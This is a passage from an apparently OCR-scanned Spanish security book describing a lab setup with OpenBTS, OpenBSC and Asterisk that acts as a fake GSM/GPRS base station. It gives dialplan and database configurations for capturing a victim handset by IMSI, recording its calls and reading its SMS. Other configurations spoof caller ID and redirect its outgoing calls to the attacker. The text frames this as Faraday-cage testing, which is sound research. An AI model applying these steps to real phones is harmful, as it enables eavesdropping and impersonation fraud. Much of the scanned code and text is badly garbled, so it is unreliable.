-  Teléfonos  Sip  registrados  en  el  /Ísícrisk  de  su  mffaestnictura.  lista  es  sin  duda  la  opción 
más  cómoda  para  el  atacante.  El  teléfono  Sip  puede  configurarse  en  el  misino  PC  donde  corre 
el  resto  de  la  infraestructura  o  bien  en  un  PC  distinto  que  tenga  concctividad  tP  con  ese  PC 
(que  es  donde  está  corriendo  Asterisk). 

Se  supone  que  en  la  pjueba  se  dispone  de  un  teléfono  Sip  registrado  en  el  Asterisk  de  la  iníiaestructLu'a, 
con  la  extensión  asignada  200 

Para  provisionar  este  tipo  de  teléfonos  en  Ásíerisk,  este  debe  disponer  de  una  entraiia  como  esta  en 
el  ficliero  de  configui  ación  sipxofifú^  Asterisk: 

I  ¿UJll 

■-al lerid— "Sof tphúriE:  2C01'"  <2  001> 
tv'ps“£riend 
Oi  1 L  L  ~s  _  p  -  _  p  c.a  1 

liost^dynanic 
3SG:re-=1234 

Y  posteriormente  releer  la  coníigui ación  sip  desde  Asterisk.  mediante  la  ejecución  del  siguiente 
coman  di)  en  la  consola  de  Asterisk: 

sip  -eload 

Fn  el  díulplan  {extenskms.üonj)  se  deberá  crear  ini  contexto  corno  el  que  signe^  : 

[softphones ] 

cx_cii  ->  _2XXX, ’l  ,7sr:üvü:j/: 

Ex-^n  _2XXX,r.^I^ial  í3IP/$, {EXTEN},  30) 

Y  modificar  el  contexto  \sip-e.xternal\  para  que  incluya  esc  nuevo  conLcxLo: 

>ip^©xternal] 

;  This  Í3  the  top-leT^^l  context  that  Lu  üu.L-oI-iLi_’LwcrX  r_:d.liirjg. 

;  a  _  jij  o  i  I) 1  li  dp  8  L  l'irj  i  r  -  ’i  p  L  %  o  r  k  c  a  1 }  j  n  q . 


20  ."Sumimos  al  lector  la  capa^idaja  para  contignrar  un  iclcfono  SiP  para  ser  registrado  en  eJ  asterisk  de  Ja  infniEísü-LLelLiru. 
Como  qjemplü,  podría  Lilili.£a]njt;  linplioiic? 

2í  V?imnñ  a  suponer  que  las  3>í tensiones  de  teléfonos  SIP  províEionados  son  aleaníables  y  que  les  asignaremos  siempre 
una  extensión  de  la  forma  2XXX.  Este  comportanñcnto  se  escoge  por  eomedidad  en  las  pruebas  Je  etmeeptu  de  lus  iiuiquea 
y  es  siisliluibíe  püi  euak]LLÍer  ubo  que  al  lector  le  parezca  adecuado. 
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xTic lv.de  - >  30  f t-pho n  e  s 
ivclvde  ->  o’jtbound-tiLuiik 

\  A  conti  ni]  ación,  se  de  be  recargar  el  dialpkm  en  Asteri^K  inediafiíe  la  ej  ce  ución  del  siguiente  comando 
'  en  la  consolide  Asier¡sk\ 

dialx:l¿in  re  load 

Tras  (o  cuaJ  se  podrá  comprobar  el  correcto  fiincionainieiito  dcl  \oftphone  de  ataque  llamando  a  la 
extensión  2600  (función  de  echo  predefinida  en  el  díalplari). 

Enrutamiento  de  llamadas  hacia  el  exterior 

Para  disponer  de  esta  funcionalidad  y  |>ennitir  que  los  teléfonos  registrados  en  la  iivfraestruelura  dcl 
atacante  puedan  cursar  llamadas  al  exterior  a  través  de  un  proveedor  de  voz  sobre  IP,  se  debe  incluir 
una  entrada  similar  a  la  siguiente  en  el  fichero  de  configuración  sipxonfái  Aslerisk: 

[VOIPProvider] 

typv=lrier.d 

;  P¿SSwcrd 

def aultuser-us^rnamé  ;  User  Ñame 

hO!iíL-£;ip.í.Jrov-id.0r .  com  ;  VDIP  provider  hostname 
inssGure^port^  invite  ;  .UefaulL  secarity  . 

;  Security  will  depend  t>ri 

pvovlder'  y  C£ip¿ibiXities 

En  la  que  slp.provider.com  representa  la  direccióri  del  servidor  sip  de  nuestro  proveedor  (con  el  que 
se  tiene  que  tener  contratado  este  tipo  de  ser%dcio)  y  eí  usuario  y  el  password  para  la  conexión  se 
configuran  mediante  los  parámetros  defdidtuser  y  secret. 

Posieriormente  se  debe  recargar  la  configuración  sip: 

sip  re load 

Adición  a  ¡mente,  en  la  sección  del  dlúiplan  {/eícVAstensk/exítinsiOns.conf),  se  deben 

iiicluu  las  siguientes  líneas: 

ex  ten  _  .í)5:  XXXXXXXX;  rv,  Answer  () 

exten  =>  _[96:XXXXXXXX^II,  Dial  (SIP/VCIPFrovider/0Ci34$  í 'XTEHK  30 ) 

y  recargar  el  dialplan  en  la  consola  de  Asterisk  mediante  el  coinaiido: 
dialplan  ve load 

Se  probará  que  el  enrutamiento  funciona  llamando  desde  el  sofiphone  de  ataque  a  cualquier  número 
nacional. 


Mota:  En  esta  configuración  se  utilizará  el  cnrutamicntn  exterior  para  lodos  aquellos 
nüinentó  que  tengan  un  formato  compatible  con  el  plan  de  numeración  español.  Ha¬ 
brá  que  modificar  el  dia/pian  si  se  quiere  que  se  utilice  paia  otro  tipo  de  llamadas 
(internacionales,  etcétera). 
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Nota;  Pñra  icientLficar  esta  confígiiración  como  pnnto  de  part^ida  del  dialplan  se  hará 
referencia  a  ella  como  ""diaip¡a?iO'\ 


Coníiguraciciii  ile  maero  para  llamadas  eutre  terminales  registrado  en  la  estación  base 
falsa 

Ehíií  luacTO  se  configurará  en  el  díaiplan  (/eic/exii^nbiiori::^.can/)^  a  coiitinuación  de  la  sección  [giobals]. 

OpenBTS  2.6 

[  ir.E.G  L  C>-  D  i  a  1 35M 1 

ex  ten  =>  3,1,  Dí¿a_  (  SIP/!$  í  ARGl  ]  ) 


Openü  1 S  2.8 

[  jr.E=.  c  r  o-  ni  ¿í  i  G  SM 1 

exten  ->  Sjr  1 , { üLJnf:_syL  { selecn  dial  frcm  dj.al'ñata_tabls  víhera  sx“en  = 

exten  =>  s,  n,  Cotolt  ($["'${ Naire  í ''  =  ?'JÍj3-rjxLc.'.L[ir.il,  ?  {MACRO_KXTKM]  ,  1) 

exten  ->  ñ,  ii,  Set  ( j.raddL--$  [tJDnc^ííQL  ( select  iPaddi:  f  rom  £ip_buddi£s  whare  nane 
}) 

exlon  ->  3,íi,Co.L3li  ($  r'$íin-tidr}"  -  ? Fr. p-exti-rna  1  ,  $  { KAC:ro_^XT7,N J  ,  M 

exten  =>  s ,  n ,  Dial  { 3 IP / í  { N ama  }  (^  5  { IPaddr }  ;  5  0 62  í 


Registro  del  terminal  /  dispositivo  víctima 

Paia  coiiieiizar  a  eiiiitir,  debe  coiiQguiarse  la  estíLción  base  con  los  siguientes  parameños  de 
configuración  (se  adjuntar  solo  los  mínimamcnlt:  necesarios): 

La  configuración  inicial  puede  realizarse  mediante  el  acceso  a  la  base  de  datos  de  configuración  de 
OpenBTS  (por  ejemplo  mediante  ""SQLíteS  /ctc/OpenBTS/OpenBTS.dP"),  ^tie  el  otro  método 
de  configuración  de  la  paramcírización  de  OpenBTS  (OpenBTSCLf)  requiere  que  Opi^i'iBTS  este 
arrancado.  El  comando  a  ejecutar  para  modificar  un  parámetros  sería  este:  "update  CONFIG  set 
VALUES  TRINO  “<Nuevü  Valür>"  wliere  KEYSTRING  "-^N  ombre  Parameñ  o  Conf>”’= 


Parámetro  de  con  Hgu  rae  ion 

Valor 

E^itplicacióii 

GSM.  R  adió.  Band 

900 

Debe  coincidir  con  la  banda  en  la  que  emiten  las 
tarjetas  biJíL 

GSM.  Radio.  CO 

51 

Este  valor  es  el  AKFCN  de  emisión  de  la  celda. 
Puede  encontrarse  una  lisia  de  ARFCNs  válidijs 
(DO  WTSI  LiNI  K)  eo :  https  ://gsm.  ks .  im  i-Jrefb  mg.  de/ 
arfen. php  y  en:  hUp://wwwAelecomabcxom/a/arfcn. 
html. 

Como  la  ejecución  será  dentro  de  la  jaula  de  Faraday, 
puede  configurarse  cualquier  valor  de  ARFCN  válido. 
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\ 


Parámelrir  de  configuración 

Valor 

Explicación 

GSMJdenUly.MCC 

cc:c 

Código  dcl  país  del  operador  que  eiiiíte  la  SIM 
instalada  en  ei  termina]  víctima  (un  listado  de  MCCs 
puede  encontrarse  aquí:  http  //en.  WiUpedia.orghvikif 
Mohile^NetwQrk  Code). 

GSM.  Jdp.níit),\  MNC 

NN 

Código  del  operador  de  telecoíiiunieacioTies  que  emite 
la  SIM  iostalada  en  el  terminal  víctima  (un  listado  de 
VINCs  puede  encontrarse  aquí:  http://en,Wíkíptdia. 
org/\Gki/Mobi¡e  Net\^?ork  Codé). 

GSM.  Iden  tity.  ShoriName 

NIXL 

Para  que  la  red  no  mande  el  nojiibre  además  del 
código  de  red. 

CfSM.  Identity.  Sho  >v  Co  un  i  ry 

NULE 

Para  que  no  se  muestre  el  código  de  país. 

GSM.Radu).  Powe.rMaiiager 
MaxAttenDB 

30 

Máxiiiia  atenuación.  T.a  potencia  necesaria  pam 
emitir  deritm  de  la  jaula  será  típicantente  baja. 

GBM.  R  adió.  PowerMun  a^or. 
MínAitenDB 

15 

Mínima  atenuación.  La  potencia  necesaria  para  emitir 
dentro  de  la  Jaula  será  típicamente  baja. 

Control  L  LUI.  QneryCla^smark 

1 

Sltvítíí  para  identificar  las  capacidades  del  terminal. 

ConlrrA.  L  UR.QueiylMEi 

1 

Sentirá  para  {>btener  las  capacidades  del  temiinal. 

ConiroldJJR. 

Unpiyyv  monedii  ej  ectCause 

0 

Se  recomienda  0  para  que  el  terminal  siga  intentando 
el  registro  indefinidamente  tías  un  rediazo.  El 
comportamiento  de  ia  mayoría  de  los  móviles  ante 
rechazo  con  código  0  es  que  realizan  3  mtentos  de 
registro  seguidos  cada  13212  minutos.  Para  más 
información  se  puede  ver:  hitp!//wwM\faddofig. 
com/do  üs/R  o  o  iedCo  n20J  2  -iWuevos  es  c  en  arios  de 
aíaquejySMGPRS.pdf. 

G.S'M  Timer.  TS2I2 

6 

Minutos  entre  registros  periódicos,  ó  es  el  mínimo 
permitido. 

jSota:  En  un  ataque  real^  ci  atacante  debería  conocei  rnán  dalow  cid  entorno  de  radio 
dei  terminal  víctima,  para  Jo  cual  deberm  ser  capa7  de  capturar  el  beacoo  de  la  celda 
que  le  da  sei-^icio  y  Cíjnñgijrar  la  estación  base  de  acuerdo  con  la  iiiformadón  obteni¬ 
da.  Además,  la  estación  base  deberá  competir  en  polcTicin  con  las  celdas  del  entorno 
del  atacante  y  imty  probablemente  desbabilitar  las  comunicaciones  3G  del  temiinal 
victima  (por  ejemplo,  utilizando  un  inhibidor).  El  atacante  puede  coinseguir  salvar 
estas  circiirstancias,  en  cuyo  caso  los  entornos  real  y  de  pruebas  son  prácticamente 
equivalentes,. 
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i 

ExísLeíi  variaos  fon  ñas  dt;  avei  iguar  t;!  ÍMSÍ  del  termina  víciinia  al  que  se  tenga  acceso  físico^" ,  sin 
embargo  se  utilizará  aquí  la  propia  infraestructura  para  averiguarlo. 

Una  vez  coníigLiiadcs  ios  parámetros,  es  posible  comenzar  a  emitir  arrancando  OpenBTS  y  esperar 
a  que  el  temiiiial  victima  intente  el  registro  en  nuestra  red.  Ya  que  el  terniinal  víctima  no  está 
pro  vi  si  onado  cu  el  registro  será  rechazado. 

Una  manera  cómoda  de  averiguar  el  IMS!  es  buscarlo  en  los  logs  de  OpenBTS  ( buscando  la  cadena 
*  'reg  istrati  on  FAI L  ED '  . 

En  este  momento,  se  puede  provisiouar  el  tenninal  víctima  asignándole  la  extensión  1001  (que  se  ha 
elegido  arbitrf^naTneute)  al  TMSI XXXXXXXXXXXXXXX  que  se  ha  visto  en  el  rechazt). 

Provisión  en  OpenBTS  2.6 

En  OpmETS  el  pro visioriani lento  de  un  íemiioal  GSM  se  realiza  mediante  la  adición  de  las  siguientes 
líneas  (como  míuimo)  ai  frehero  sipxonf  existen 

[  ii']¿  ixxxxxx>:x:o>oí:<xxx  ] 
c^llerid.=  LÜÜl 
r: n  rX.  i  n vi  a 

tvpe^frie:nd 
cantsxt=3ip-lcical 
a  1  1 

l'iast=dYua:r.ic 


A  continuación,  se  ejecutará  el  siguiente  comando  en  la  consola  de  Asterij^k: 

3ip  reloaá 

Adicionalmente,  en  e!  contexto  [pilones]  del  clicilphm  se  deberán  configurar  las  siguientes  líneas: 

;  Di^.i  to  U3er  lüül, 

Fí K -:.e I-  1 11  f]  ,  l  o u p  { Ca .1 1.  Lo  S I P / 1 M S T XX XXX XX X XX X XXX X ) 

ex-er.  =>  100 1 ,  n,  Macro  í dialGSM,  IMSIXI^XXXXXXXXXXXXX) 


Nota:  Si  uo  se  quiere  usar  la  macro  preparada,  las  dos  lineas  anteriores  pueden  susti¬ 
tuirse  por  exten  =>  1 00 1 . 1  jy\7Ú(Sip/  ÍMSTXXXXXXXXXXXXXXX) 


Tras  rccaqíaT  el  dialpiim  {diülplan  relajad) ^  se  piietle  esperar  al  siguiente  registro  íicl  Icrminal. 


Cuando  el  siguiente  regisfno  se  produzca,  este  debería  ser  aceptado  y  se  vería  el  correspondiente 
niensafe  en  la  consola  de  Aster isk.  Para  obtener  más  intbrmacióu  del  tenninal  y  asegurarse  de  que 
se  iicuc  eoTTUinicaeión  con  óL  se  puede  ejeeiiínr  desde  la  cousíila  OpenBTSCfJ  el  siguiente  enmandíj 
para  mostrar  tabla  de  TMSiS  asignados  al  IMSi  (debería  aparecer  también  el  LMEl  del  terminal): 

t  "ns  i  e 


22  hitp://^mfr¿íi/iOMrg/reíJmifié^/projí’cIs/giTíiríiíIi>üAvikj/0¿M.'riBTSS<.^ífiÑgUpAiik'rrsk 
21  Píita  conñguraciÓFj  debe  realizarse  por  cada  terminal  coíilíguradc 
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Y  para  veriñcar  que  se  tiene  común icacitm  con  el  dispo.sitivo: 

senLi.sn.s  í<XXX>LXXXX>ZíXXXX  OCOO 
He::3sajs  de  prueba 

Cuantito  al  mensaje  llega  al  terminal,  se  está  seguros  de  que  el  Lcrminal  es  accesible  vía  sii  interfaz  de 
radio.  Una  forma  de  verificar  deñiiitivarncTiLc  que  el  ataque  con  estación  base  falsa  ha  funcionado  (y 
por  tanto  se  pueden  realizar  todas  las  manipulaciones  sobre  las  coiiiiJiiic aciones  GSM  dcl  Lcmiinal 
que  se  explican  a  continuación),  es  realizar  una  llamada  contra  di  desde  un  .mftphone  configurado 
(marcando  la  extensión  asignada  al  terminal  nióvil  1 0t>  1 ).  Si  la  llamada  se  establece,  la  configuración 
es  correcta  y  se  podrán  realizar  las  pmebas  posteriores. 

Provisión  en  OpenB  1  S  2-S 

Para  provi  sionar  un  terminal  en  OpenBTSIM  hay  que  darlo  de  alta  cu  la  base  de  datos  de  sfpauthserve. 
Las  columnas  significativas  de  estábase  de  datos  son-b 


Columnas  dé  la  tabla  dialdala  tahle; 


1 

La  extensión  a  asignar  al  iMSI. 

dial 

El  IMSI  a  prüvisit>nan  en  formato  “IMSLKXXXXXXXXXXXXX''.  | 

Columnastie  la  tabla  s¡|i_buddies 


ñame 

y|  IMSl  a  provisionar,  cu  formaLi)  “IMSrXXXXXXXXXXXXXX”. 

username 

El  IMSl  a  provisionar,  en  formato  “IMSIXXXXXXXXXXXXXX”. 

typa 

“ftiend”. 

comext 

El  cojitext  del  dialplan  para  este  usuario  (ei  configurado  eii  el  dialplan  que  se 
suministra  con  OpenBTS  ‘"phones”). 

hosr 

^  "'dyiiamic'"  es  el  valor  rccorneudado  para  la  configuración  propuesta. 

callerid 

El  identificado!  de  llamada  para  esíc  tcnuinal. 

canreinvite 

"'no”  (recomendado  para  OpeitBTS  i.í). 

allow 

chmjmode 

ípciddr 

La  dirección  TP  del  host  donde  se  registra  ej^teléfono.  Actualizado  por  sipauthsarve. 
F.n  el  caso  de  la  configuración  propuesta  será  127.0.0. 1 . 

Así,  al  utilizar  SQLiteS  para  acceder  a  las  bases  de  datos  de  configuración  citadas,  los  comandos  a 
ejecutar  serían: 

sq]  i  Lo  3  /  V  ar  /  _  ib  /  dS  ter  i  3  k/  sql  i  te  3dii:  /  sql  i  te3  .  db 

insert  irioc  di¿ildat,^_ldlj_fj  (exter.^  dial)  valúes  [''■1001'^^  ^^IMSIXXXXXXXXX:<XXXX'' ) 
Insert  ir.tc  sip_bndd.ieE  (nane,  i:.soT:na.Tie,  Lypo,  cuiiLext^rhost ,  callerid^  c&nreinvitep  alio 
w ,  ¿Imlmodo ,  iPatidr )  valúes  ( IXX:o:x:C>íXXX]ÍXXX"%  ""  LM.STXXXXXXXXXXXXXX" ,  "friona"" ,  "pho 
nes"",  '■"100:1  ",  "gsn"",  "info"b  ""127 . 0  .  C  ,  1"  ) 

.  quio 


74  RP.F  hí fp:/M-  w  meniby.  com/david-blií'géSS- 5/opm  b Ís-28-pmvís  iúrún^-.  hrm  t 
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Las  verificaciones  del  registro  se  pueden  realizar  de  forma  idéntica  a  corno  se  ha  explicado  para  ía 
versión  2.6. 


Nota:  A  partir  de  este  momento  todas  1as  manipii  la  clones  sobre  las  comunicaciones 
de  la  victima  no  dependen  ya  de  OpenBTS,  sino  que  se  manejan  (casi  totalmente)  ú^s- 
de^iíí:rí*!i'A.  La  ooniiguración  ác  Asterisk  que  se  presenLa  en  los  siguientes  ejemplos 
está  pensada  para  ser  lo  más  sencilla  e  ilustrativa  posible.  Sin  embargo,  una  configu¬ 
ración  avanzada  de.d  jíerrjí:  pennitirla  configurar  toda  la  funcionalidad  presentada  de 
ujia  rormainás  corripleLa,  auLonmlizada  y  operable. 


Interceptación  de  comunicaciunes  de  voz 

Las  ecmunicacioiie&  de  voz  pueden  ser  fácilmente  interceptadas  desde  Asteri^k. 

Se  presciiUt  a  eonlin nación  una  posible  eonñguraeión  de  AsterL\'k  para  interceptar  todas  las 
comunicaciones  que  el  teléfono  víctima  (a  quien  se  le  ha  asignado  la  extensión  1001)  establezca  con 
cualquier  dispositivo  (tanto  como  origen  como  destino  de  llamada).  Para  ello,  se  debeián  modificar 
el  contexto  [pilones]  del  cUalplanú  añadiendo  al  inicio  del  mismo  las  sigLiíenlcs  lincas  (anles  de  la 
llamada  a  la  macro  DíalCSAí): 

[phor.es' 

exten  =>  U, ,  l,Go-cl£  (í  [  B  {CALLERID  {nuttO  >  J»  ICOl]  ?norscf  roiTi) 
e  X  t  er  -  >  _N . ,  ^  A  r  s  %  c  £  [ ) 

ex ter  =>  _N . ,  r. ,  KixMoni tor  i  /  tmp  /  R^o_Fr om_í  { CALLERID  Cmiir.)  }  í  TEFT IME  { ,  ,  d%H 

■sH)  1  .gsm) 

e  X  t.  e  r  -  >  N  .  ^  i"  ^  í  t  oT  c:  ( ii  or  e  c  l  o ) 
e  X  te  r.  =  >  _N . ,  n ,  An  s ví  e  r  [ ) 

exter_  =>  _N .  ,  n  morecf  rom)  ^  Gotolf  [  S  [  $ -;  ]=  1001]  ?noreGto) 

exter  ->  _N  .  ,  r ,  i  xFor  i  to r  (  /  Linp / Rcc_Trj_$  KX' i’ KW  }_$  [ .STFJ’T IMF  { ,  ,  %Y j  >  .  y  liíl } 
e X ten  =  >  N . ,  r.  ( n o r e  c”  o )  .  N oOp  í  >  ; 

Posteriormente  se  debe  recargar  el  dkdplan  en  yísterií'A"(aia:pian  reioad). 


Esta  configuración  hará  que  Asterisk  grabe  cualquier  conversación  a  y  desde  el  teléfono  víctima  a 
cualquier  númeio  real  en  un  fichero  con  el  formato  /lrnp/Rec_  (From  ¡To }_  1 00 1  _\"YYYMKTODhhTiiTii . 
gsm)  que  luego  se  podré  escuchar  con  (por  ejemplo)  lajitilidad  ploy. 


Yom:  La  interceptación  de  comunicación  puede  hacerse  de  muchas  formas,  y  la  con¬ 
figuración  anterior  es  solo  una  muestra  de  ello.  Es  posible  configurar  la  gmb ación 
a/^desde  dctcmiinados  u limeros,  en  detenn inadas  franjas  htítarías,  ele.  Hn  generah 
Asterisk  es  lo  suficientemente  completo  como  para  proporcionar  toda  la  flexibilidad 
necesaria  en  este  sentido. 
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Interceptación  de  mensajes  SMS 

lufra estructura  basada  en  OpeiiBTS  2.6 

Para  poder  activar  la  intercepción  de  ineüsajes  es  necesario  asegurarse  de  que  las  siguientes  líneas 
tengan  los  siguientes  valores  en  el  ñchero  de  configuración  út  smqueuú  {smquüiw.configy. 

i  Lagging  level 
Loíj .  Le  ve  i  DI  BU  G 

Loq .  _ie  ví^  1 .  oniti a  n  ds  .  cp-p  }  h ;  B  i.J  G 

Si  se  niaiitieneii  las  opciones  por  de  recto  (no  se  eonfEgura  fiebero  de  ¡og)  eiialqiiier  merisaje  enviado 
desde  el  terminal  víctima  a  otro  dispositivo  aparecerá  en  el  tenTiinal  donde  se  ha  arrancado  smqueue, 
con  un  contenido  similar  al  presentado  a  continuación: 

Via:  5lP/2,0/UDP  127 . 0  ,  C  .  1 :  5Ü62 ;  brarich=z  9hG4b!<4  3203 

F-o  ;  TM5TXXXXXXXXXXXM1ÍXX  <?jlp :  IMSIXXXXXXXXXXXXXXX^127  .  C  .  3 . 1>;  -eg=rc jbg 
Lo:  <sip : 91111111H?127 . 0 . G  .  1> 

CalL-ID:  11 5902 D514@ 12 7 . 0 , C . 1 
G.Sec-:  I  h‘.l  H-'^SAGK 
Content-Type ;  text/plc.in 
Max - Fe  r wa  r d 3 :  7  0 
C : on  t. en  t - 1  engír.h  :  3 

SMS  de  prueba 

Infraestructura  basada  en  OpenBTS  2.8 

El  módulo  de  smqueuc  OpenBTS  2,8,  por  defecto  guarda  los  mensajes  de  haciendo  uso  del  syslog 
del  sistema.  Por  lo  que  cualquier  mensaje  enviado  desde  el  terminal  víctima  quedará  registrado  en  el 
mismo.  La  línea  que  muestra  el  contenido  del  mensaje  tiene  un  aspecto  similar  al  que  sigue: 

3  ep  9  17:49:57  LAPTOPO 1  .‘=5nqni en  e  :  I  N'  H't]  3  07  R  G  02  9 1  2  stirqii  o  L..e  .  cpy: :  1 4  C  5  :  Lan  rllt:  u ñor  L 
code :  £h.cr'7  cods  SMG  smsc  Veict  ’’'SM5  de  prn.efc3.^^ 

Ataques  basados  en  la  suplantación  dcl  número  llamante 

De  nuevo  se  utilizará.  /creisA  para  la  suplantación  del  número  llamante.  Imagínese  que  se  quiere 
que  euando  se  llame  desde  el  teléfono  de  ataque  al  teléfono  \ictima,  este  reciba  la  llamada  con 
identificador  de  numera  llamante  911111111.  Una  posible  configuración  de.  ísítv  fjApara  conseguirlo 
podría  co asistir  en  cambiar  el  código  llamante  del  teléfono  de  ataque  liLcdiaiitc,  por  ejemplo,  la 
adición  de  la  siguiente  líuea  al  inicio  del  contexto  [pboues]: 

ex-en  =>  Jt. ,  1,  Execlf  í$  [CALLEP.ID  (nun)  =  2001]  7Set  (GALLERID  (numí -911111 111)  ) 

y  rceargar  el  diniplan  en  la  consola  de  /í,í^^OT.s^Tucíliaute  el  comando: 
dialplan  reload 

De  esta  forma  se  consigue  que  cada  vez  que  el  telefono  Sip  de  ataque  llame  al  Lelcfono  vicLima  el 
identificador  del  rúmero  ílannaute  sea  el  que  se  ha  puesto  como  ejemplo:  91111 111 L 
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Nota:  Esta  prueba  sirve  para  ilustrar  que  la  creencia  popular  de  que  el  número  lla¬ 
mante  es  suficiealeineiiie  válido  para  autenticar  a  quien  origina  la  Uainada  no  es  cier¬ 
ta.  Debí  di  j  a  esta  creencia  además  piicdeTi  prosperar  otro  tipo  de  ataques  de  ín  gen  i  en  a 
social  en  los  que  el  disponer  del  número  llamante  adecuado  puede  suponer  una  ven¬ 
taja. 


En  el  caso  de  los  SMS,  la  suplantación  del  número  llamante  es  trivial  y  no  se  necesita  de  una 
iutraestrucuira  con  estación  base  para  hacerlo.  Si  se  quisiera  suplantar  al  numero  911111111  al  enviar 
un  SMS  al  telefono  victima  utiii/afidn  una  infracstnretura.  se  podría  hacer  simplemcnLc  cjecuLantin 
el  siguiente  comando  en  h  consola  de  OpenBTS: 

senásms  IM3IXXXXXXXXXXXXXX  91L111111  SKS  a 


Ataques  basados  en  la  rcdircccíón  del  número  destino 

Se  puede  también  mediante  coofiguíación  de  Asterlsk,  redirigli  cualquier  llamada  efectuada  desde 
el  móvil  víctimíL  por  ejemplo,  hacia  el  teléfono  del  atacante.  Para  ello,  una  posible  configuración 
sería  añadir  la  siguiente  línea  antes  de  la  invocación  a  la  macro  DialOSM  m  el  contexto  [phones] 
del  díaipia?!: 

cxiEii  =>  _U.  ,íl,GoLüIí  ($  I  CALLERID  [nui:L)=l(:iíJl  &  $  •' EXUEir' llllllí  | 
cal; 20D1, L) 


Y  Hc  puede  probar  que  la  rcdircccíón  fújicinna  tras  recargar  cl  diülplan  en  AA'tmsL 


Nota:  Esla  prueba  sirve  para  ilustrar  que  la  creencia  de  que  auLentiear  cl  desLino  de  la 
llamada  por  el  hecho  de  llamar  nosotros  es  falsa.  Un  atacante  podría  utilizar  esto  para, 
por  ejemplo,  suplantar  a  un  operador  de  una  entidad  bancaria. 


4,  Manipulación  de  comunicaciones  GPRS/EDGE 

Preparación  de  la  infraestructura  para  pruebas  de  ataque  cou 
estación  base  falsa 

Conexión  de  los  distintos  elementos  de  la  infraestructura 

.Ailtes  de  iniciar  uiia  prueba  de  ataque  coa  estación  base  falsa  GPRS/Ed^e,  será  uecesaiio  conectar 
todos  los  elementos  ínvoliierados,  como  se  describió  anLcrionncntc  y  como  se  muestra  cu  la  siguiente 
ñgura,  aquí  reproducida  de  nuevo  para  comodidad  del  lector, 
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ImíiGen  l2/i4:  Conipon entes  de  iin<i  infraestmclitiíi  bEiyada  eii  OpetjBSC. 


Esta  configuración  del  laboratorio  síitc  para  simular,  en  un  eriLurruj  controlíiílo*  el  escenario  de 
ataque  i'eal  que  se  oiuestm  en  la  siguienLc  figura: 


¡inaj^en  1 2. OS:  Escetiíuiú  de  ataque  biiuLiludu  ei  laboratorio. 


Prueba  de  conexión  a  Internet  desde  el  PC  de  manipulación 

Dado  que  k  aalida  a  ínLcmct  del  resto  del  laboratorio  pasa  por  el  equipo  de  mauipuíación,  lo  piiinero 
será  comprobar  que  este  equipo  tiene  acceso  a  Internetj  sea  por  la  vía  que  sea:  3G,  ADSL.  LAN,  etc. 

Se  recomienda  probar  tanto  la  con  ce  ti  vi  dad  ÍP  como  el  acceso  al  servicio  DNS.  Ambas  cosas  se 
pueden  probar  conjunlamcTite  comprobando  que  se  recibe  respuesta  ejecutando  piiig  en  el  equipo 
de  mampulación: 
pi::ig'  .  google  .  c:?m 
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Prueba  de  conexión  a  Internet  desde  el  PC  de  OpenBSC 

A  conLinuaciÓTi,  será  convenieEte  veníicar  que  el  equipo  OptnBSC  LaiTibiéu  tiene  acceso  a  Internet 
a  través  del  equipo  de  mauipiiiaciiM.  La  ctmucLividaíl  se  pnede  verificar  igual  que  antes,  pero 
ejecutaado  el  comando  en  el  equipo  Ope.nBSC\ 

pi  r_g  .  g  c  og  1  e .  c  om 

Además,  será  convenicrUe  verifieur  que  en  la  t^bla  de  nitaá  del  equipo  OpenBSC  está  declarado 
corno  rouLer  pm  tlcfecío  (  0,0. 0.0)  el  equipo  de  manipulación,  y  que  como  servidor  de  muTibres  esrá 
declarado  el  equipo  de  manipulacióoH  Los  siguientes  comandos  pueden  ayudar  a  comprobar  estos 
puntos: 

ret.  “Til 

cat  / e te / r s olv ,  enn  P 


Arranque  del  software  relacionado  con  OpenBSC 


Nota:  Antes  de  arrancar  los  programas  relacionados  con  OpenBSC  corno  se  desenhe 
a  contmu ación,  será  necesario  configurarlos  correetamente.  Al  menos  debería  revi¬ 
sarse  antes  de  cada  prueba  que  el  MCC  y  MNC  conñgtirados  en  OperiBSC.cfg  sou 
los  deseadlas  para  cada  caso.  El  resto  de  parámetros  es  probóle  que  una  vez  etnv 
figurados  no  sea  necesario  moditícarlos  para  cada  prueba,  pero  aun  así  puede  ser 
conveniente  repasarlos. 


Los  elementos  soñwarc  a  arrancar  en  el  equipo  (JpenBSC,  aparte  del  propio  sistema  operativti  con 
su  eonfiguracián  de  taijetas  y  rutas  de  red,  son: 


iptablc^ 

Como  mínimo  se  debe  habilitar  mtnmg: 

echo  "U"  >  /■proc/syL./:jü  _./ipv4/ip  forvard 

GGSN 

A  rra  n  car  Open  G  GSN'. 

/  epe  /  gg  3  r.  /b  íti  /  gg  ®  n  -  r:  /  ñt: /  o p  L  /  g  g ü  1 1  /  g  ga  n .  c  c  n  f 


SGSN 

Arrancar  OsmoSGSN^: 

I  op t  /  openbs  c /h  in  /  osmíí-s  gse  /  ir t.f:  /  op  r  /  o'OL-t  nb.'-:W.:  /  oL^'ao-  cgsr. ,  c  f  g 

Para  obtener  informaeinTi  de  logging  y  poder  ejecutar  diversos  comandos  de  control  s{>bre 
OsmoSeSN^  establecer  una  sesión  TELNET  con  el  puerto  4245  del  localhost 


telr.et  Iccalhoít. 
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Por  ejemplo,  para  obtener  información  del  nivel  MM  {MobiUty  ManagEmEnfp  que  es  el  que  niuesLra 
mensajes  míonnativos  diEaiite  el  registro  de  los  terminales,  ejecutar  io  siguiente  en  la  sesión  de 
TELNET; 

ensJbLe 

l'j'Ejíj:  c.'iLibJ  :j 

loqqinq  filter  al  i  1 
logging  iev^I  mri  debng 


OpenBSC 

At  rancar  OpenBSC'. 

/opt/cjp0iii:'íJc/bir:/cp.^mc-JiiLb  /e-Lu/üp  .  /openbñri/np-AnbFiC-  r.fq  \ 

-1  /v¿^r/op-/op&nbÉG/hlr  .sqlite3 

Para  obtener  información  de  logglng  y  poder  ejecutar  diversos  comandos  de  control  sobre  OpenBSC, 
es  Lab  le  cor  una  sesión  TELNET  con  el  puerto  4242  del  ¡ocalhosK 
tislr.et  Iccalhost  4242 

Por  ejemplo,  paia  obtener  iiitónnación  del  nivel  MM  (MobiHty  Managemem),  que  es  el  que  muestra 
mensajes  ínfomiaLívos  duranle  el  registro  de  los  terminales,  ejecutar  lo  siguiente  en  la  sesión  de 
rLLNE'r: 

í^nable 

logging  er.abla 

logging  ±Ll~Er  all  1 
loqqinq  levEl  nin  ¿ehuq 


Nota:  Si  se  ñiera  a  realizar  manipulación  de  comunicaciones  G$M  y  SMS,  además 
de  las  de  datos,  seria  nccesarío  arrancar  también  y  LCR. 


